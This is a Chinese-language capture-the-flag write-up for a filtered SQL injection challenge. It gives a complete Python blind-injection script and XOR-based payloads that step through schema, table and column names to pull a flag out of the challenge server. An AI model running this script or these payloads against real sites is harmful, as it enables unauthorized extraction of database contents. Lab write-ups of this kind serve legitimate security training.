首先试探规则,发现过滤关键词

admin被过滤

单引号

双引号

or

1=1

等于号被过滤

image-20210815144207909

试了一大堆发现不行,存在多处过滤

尝试最简单的单纯数字和字母,可以通过但是密码错误:

image-20210815144323616

突然发现所谓的神秘代码,逐个阅读发现是盲注

image-20210815144452675

利用脚本盲注:

在网上找到的大神脚本:(改下路径就可以了)

import re
import requests
import string

url = "http://b8e3d121-1efb-4e5c-84e0-caeca8075697.node4.buuoj.cn/search.php"
flag = ''


def payload(i, j):
    # 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)
    # 列名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    # sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)
    data = {"id": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

第一波先查找数据库名:

核心SQL语句:

# 数据库名字
    sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)

image-20210815153413296

显然数据库名:geek

第二波查询数据库中的表名:

核心SQL语句:

# 表名
    sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)

image-20210815153844403

共有两个表:F1naI1y , Flaaaaag

第三波查询数据库中表的列名:

首先是第一个表:F1naI1y

核心SQL语句为:

# 列名
     sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)

image-20210815154349123

可以发现表F1nal1y共有三列:id username password

接着是第二个表:Flaaaaag

核心SQL语句为:

# 列名
     sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))>%d)^1"%(i,j)

image-20210815154711719

可以发现表Flaaaaag共有两列:id fl4gawsl

最后在各个表中寻找flag:

首先在表F1naI1y中:

核心SQL语句为:

# 查询flag
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1" % (i, j)

查询的有点久:

image-20210815161017851

找到FLAG。

flag= cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{754ec756-2a50-4077-a43f-d2c2b86dbca2}

再在表Flaaaaag中寻找:

核心SQL语句为:

# 查询flag
    sql = "1^(ord(substr((select(group_concat(password))from(F1aaaaag)),%d,1))>%d)^1" % (i, j)

image-20210815161318956

未找到flag。